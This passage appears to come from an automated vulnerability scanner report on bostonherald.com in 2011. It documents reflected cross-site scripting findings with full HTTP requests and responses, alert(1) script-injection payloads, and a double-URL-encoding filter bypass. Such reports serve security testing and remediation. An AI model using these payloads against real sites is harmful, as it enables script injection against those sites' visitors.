Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:07:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:07:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/201119ef4\"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/">
...[SNIP]...

4.778. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dab"><script>alert(1)</script>b404e1442a7 was submitted in the REST URL parameter 6. This input was echoed as 13dab\"><script>alert(1)</script>b404e1442a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/0113dab"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:08:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/0113dab\"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/">
...[SNIP]...

4.779. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3824"><script>alert(1)</script>ec4b7781a2e was submitted in the REST URL parameter 7. This input was echoed as a3824\"><script>alert(1)</script>ec4b7781a2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26a3824"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26a3824\"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/">
...[SNIP]...

4.780. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0bb1"><script>alert(1)</script>0c6338846da was submitted in the REST URL parameter 8. This input was echoed as d0bb1\"><script>alert(1)</script>0c6338846da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1"><script>alert(1)</script>0c6338846da/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1\"><script>alert(1)</script>0c6338846da/">
...[SNIP]...

4.781. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59440"><script>alert(1)</script>a90735c589b was submitted in the REST URL parameter 5. This input was echoed as 59440\"><script>alert(1)</script>a90735c589b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/rap_sheet/index.php/201159440"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:01:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:01:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/rap_sheet/index.php/201159440\"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/">
...[SNIP]...

4.782. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea2b"><script>alert(1)</script>c53f3083bf9 was submitted in the REST URL parameter 5. This input was echoed as 8ea2b\"><script>alert(1)</script>c53f3083bf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/20118ea2b"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/20118ea2b\"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

4.783. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9bc2"><script>alert(1)</script>4c7b0ea2d57 was submitted in the REST URL parameter 6. This input was echoed as b9bc2\"><script>alert(1)</script>4c7b0ea2d57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/2011/01b9bc2"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:04:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/2011/01b9bc2\"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

4.784. http://www.bostonherald.com/includes/processAds.bg [companion parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc2d1"><script>alert(1)</script>6c821273efd was submitted in the companion parameter. This input was echoed as bc2d1\"><script>alert(1)</script>6c821273efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1"><script>alert(1)</script>6c821273efd&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1\"><script>alert(1)</script>6c821273efd!x14">
...[SNIP]...

4.785. http://www.bostonherald.com/includes/processAds.bg [companion parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a67b1</script><script>alert(1)</script>4ab8f6765b0 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2148
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0!x14">
...[SNIP]...

4.786. http://www.bostonherald.com/includes/processAds.bg [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea775"><script>alert(1)</script>9030106f1a6 was submitted in the page parameter. This input was echoed as ea775\"><script>alert(1)</script>9030106f1a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomeea775"><script>alert(1)</script>9030106f1a6 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/homeea775\"><script>alert(1)</script>9030106f1a6@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

4.787. http://www.bostonherald.com/includes/processAds.bg [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37376%2527%253balert%25281%2529%252f%252fe6f611bda68 was submitted in the page parameter. This input was echoed as 37376';alert(1)//e6f611bda68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome37376%2527%253balert%25281%2529%252f%252fe6f611bda68 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2016
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home37376';alert(1)//e6f611bda68@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

4.788. http://www.bostonherald.com/includes/processAds.bg [position parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7107c</script><script>alert(1)</script>2ef88115157 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/processAds.bg?position=x147107c</script><script>alert(1)</script>2ef88115157&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
